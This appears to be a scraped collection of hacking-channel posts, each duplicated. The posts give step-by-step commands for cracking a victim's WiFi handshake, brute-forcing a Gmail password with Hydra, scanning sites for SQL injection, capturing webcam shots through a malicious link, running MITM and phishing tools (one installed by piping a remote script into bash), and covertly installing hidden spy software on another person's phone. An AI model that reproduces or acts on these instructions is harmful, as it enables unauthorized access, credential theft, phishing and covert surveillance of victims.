Forwarded from Innovation
First connect your wife-adapter to your device :
1) Friends first open Your termux and start the monitor mode by
typing these commands :
airmon-ng airmon-ng start wlan0
2) Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
Now create one folder and name it cap on your desktop or sd card and also create a password list
to brute force the WiFi handshake ,collect the information about victim and create the password list
for brute force.
4) Copy victim’s BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
There you must give the cap folder path if your created this cap folder on sdcard then you can give
this path : -w /sdcard/cap/ wlan0mon
5) Now open another terminal and disconnect all devices with this command and capture a wifi
handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
6) now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
7) this is a brute force attack if any password match to the handshake then it will be cracked.and you
get the key (means passwords)
1) Friends first open Your termux and start the monitor mode by
typing these commands :
airmon-ng airmon-ng start wlan0
2) Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
Now create one folder and name it cap on your desktop or sd card and also create a password list
to brute force the WiFi handshake ,collect the information about victim and create the password list
for brute force.
4) Copy victim’s BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
There you must give the cap folder path if your created this cap folder on sdcard then you can give
this path : -w /sdcard/cap/ wlan0mon
5) Now open another terminal and disconnect all devices with this command and capture a wifi
handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
6) now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
7) this is a brute force attack if any password match to the handshake then it will be cracked.and you
get the key (means passwords)
□● SQLscan ●□
#sql #sqlmap #website #vulnerability
git clone https://github.com/N74NK/SQLscan
cd SQLscan
php scan.php
●□ you can scan single site or multiple URLs together
📍php scan.php -l list.txt
●□ you can save URLs in a txt file save in storage/ or storage/downloads and copy paste fullpath /storage/emulated/0/Download/httplist.txt or u can save in SQLScan file
📍php scan.php -u for single url scan
●□ only url no need of --dbs like in sqlmap
YouTube
https://youtu.be/uhVbQr2Y35g
#sql #sqlmap #website #vulnerability
git clone https://github.com/N74NK/SQLscan
cd SQLscan
php scan.php
●□ you can scan single site or multiple URLs together
📍php scan.php -l list.txt
●□ you can save URLs in a txt file save in storage/ or storage/downloads and copy paste fullpath /storage/emulated/0/Download/httplist.txt or u can save in SQLScan file
📍php scan.php -u for single url scan
●□ only url no need of --dbs like in sqlmap
YouTube
https://youtu.be/uhVbQr2Y35g
php scan.php -l /storage/emulated/0/Download/httplist.txt
□ it will start scanning all the urls for any vulnerable
□ it will start scanning all the urls for any vulnerable
#termux packages
How to install termux packages
after installing termux
type
apt update && apt upgrade
And type
pkg install git
and clone this package
Copy past 👇
git clone https://github.com/Technoashofficial/Termux-packages
Now to open type
cd Termux-packages
ls
chmod +x *
sh Basic-pkg.sh
👆👆that's all it will start installing packages needed ..
How to install termux packages
after installing termux
type
apt update && apt upgrade
And type
pkg install git
and clone this package
Copy past 👇
git clone https://github.com/Technoashofficial/Termux-packages
Now to open type
cd Termux-packages
ls
chmod +x *
sh Basic-pkg.sh
👆👆that's all it will start installing packages needed ..
#SayCheese v1.0 / Take #webcam shots from target just sending a malicious link
git clone https://github.com/thelinuxchoice/saycheese cd saycheese
ls
chmod +x saycheese.sh
bash saycheese.sh
● Now to save the picture
cp cam17Jul2019143022.png /sdcard
👆 save to sd card and check es file explora you will see the pic saved in it ...
git clone https://github.com/thelinuxchoice/saycheese cd saycheese
ls
chmod +x saycheese.sh
bash saycheese.sh
● Now to save the picture
cp cam17Jul2019143022.png /sdcard
👆 save to sd card and check es file explora you will see the pic saved in it ...
Forwarded from Innovation
To hack a gmail account first.
Step1 apt-get install hydra
Step2 cd /sdcard
Step3 ls
Step 4 hydra -l youremail@gmail.com@gmail.com -P Document.txt -s 465 -S -v -V -t 1 victimah@.gmail.com smtp
First of all create a file named document.txt which contains password list which you guessed then copy it in $HOME Directory
Step1 apt-get install hydra
Step2 cd /sdcard
Step3 ls
Step 4 hydra -l youremail@gmail.com@gmail.com -P Document.txt -s 465 -S -v -V -t 1 victimah@.gmail.com smtp
First of all create a file named document.txt which contains password list which you guessed then copy it in $HOME Directory
#Websploit #MITMAttack
#metasploit
#web
Websploit Advanced MITM Framework || MITM Attack for Termux Powerfull Tool || TermuxHacking
📍apt update && apt upgrade
📍 pkg install git python2
📍 git clone https://github.com/websploit/websploit.git
📍 cd websploit
📍 pip2 install scapy
📍 python2 websploit
📍 help
#metasploit
#web
Websploit Advanced MITM Framework || MITM Attack for Termux Powerfull Tool || TermuxHacking
📍apt update && apt upgrade
📍 pkg install git python2
📍 git clone https://github.com/websploit/websploit.git
📍 cd websploit
📍 pip2 install scapy
📍 python2 websploit
📍 help
#HiddenEye
#phishing
Auto install link
pkg install curl && bash -c "$(curl -fsSL https://git.io/fjzhu)"
Type hiddeneye
#phishing
Auto install link
pkg install curl && bash -c "$(curl -fsSL https://git.io/fjzhu)"
Type hiddeneye
Hownto make a wordlist.txt for brute force attack
#wordlist
https://github.com/Cabdulahi/wordlist
cd wordlist
ls
chmod +x word.py
python2 word.py
●● how to get any words
[💾]Find The File /sdcard/wordlists.txt
[📝]Insert Custom word: fishing
[📝]Min Length: 1
[📝]Max Length: 3
[📌]Choose Any Character
[{1}]Lower-Case[a-z]
[{2}]Upper-Case[A-Z]
[{3}]Numbers[0-9]
[{4}]Special Characters[@#?$%(And More )]
Cabdulahi=>>: 3
●□ I will explain little bit
Example my word is fishing and I want to get with few numbers after fishing example
Fishing2
Fishing3
Fishing300
So I have to type fishing only in 📝]Insert Custom word:
It I type fish it will start like this
Fisha
Fishab
Fishabc
Fishawe
Like that
In length of I type 1 and max 3 it will add 3more letters to length Like fishingabs
Fishingavc
Fishingtyy
Fishingtyy
●if I type 6 in max length it will add 6 more letters to the word u can add how many letters or numbers you want add in max length
It will be saved on sdcard/ or storage
#wordlist
https://github.com/Cabdulahi/wordlist
cd wordlist
ls
chmod +x word.py
python2 word.py
●● how to get any words
[💾]Find The File /sdcard/wordlists.txt
[📝]Insert Custom word: fishing
[📝]Min Length: 1
[📝]Max Length: 3
[📌]Choose Any Character
[{1}]Lower-Case[a-z]
[{2}]Upper-Case[A-Z]
[{3}]Numbers[0-9]
[{4}]Special Characters[@#?$%(And More )]
Cabdulahi=>>: 3
●□ I will explain little bit
Example my word is fishing and I want to get with few numbers after fishing example
Fishing2
Fishing3
Fishing300
So I have to type fishing only in 📝]Insert Custom word:
It I type fish it will start like this
Fisha
Fishab
Fishabc
Fishawe
Like that
In length of I type 1 and max 3 it will add 3more letters to length Like fishingabs
Fishingavc
Fishingtyy
Fishingtyy
●if I type 6 in max length it will add 6 more letters to the word u can add how many letters or numbers you want add in max length
It will be saved on sdcard/ or storage
Forwarded from Malware BYTES (Beki Bami)
⚛how to hack phone, record call, gps, facebook⚛
1,👉first go to the website called "https://www.spy-phone-app.com/spapp_download/download/download12573"
2,👉 then download the app called spy phone app from that website or the app called mon.13.0.0 from our channel
3,👉goto google setting > security > uncheck "scan device for security threat"
4,👉after u make that install the app on u want to spam phone
5,👉register the new account on the application or login if u have already an account
6,👉 after ur registration go back to the previous website link then signin with ur account
7,👉in order to make the app invisible and undeleteable u must go to the app setting and check "device administrator"
8,👉finally ur done u can track his/her phone call,message,gps etc
✴️application features✴️
👉record phone calls
👉track messages
👉track gps
👉hack facebook & whatsup (if the phone is rooted)
👉contacts
👉photos and videos
🔯the application is uploaded on our channel
@malwarebytes_ethio
@malwarebytes_ethio
@malwarebytes_ethio
1,👉first go to the website called "https://www.spy-phone-app.com/spapp_download/download/download12573"
2,👉 then download the app called spy phone app from that website or the app called mon.13.0.0 from our channel
3,👉goto google setting > security > uncheck "scan device for security threat"
4,👉after u make that install the app on u want to spam phone
5,👉register the new account on the application or login if u have already an account
6,👉 after ur registration go back to the previous website link then signin with ur account
7,👉in order to make the app invisible and undeleteable u must go to the app setting and check "device administrator"
8,👉finally ur done u can track his/her phone call,message,gps etc
✴️application features✴️
👉record phone calls
👉track messages
👉track gps
👉hack facebook & whatsup (if the phone is rooted)
👉contacts
👉photos and videos
🔯the application is uploaded on our channel
@malwarebytes_ethio
@malwarebytes_ethio
@malwarebytes_ethio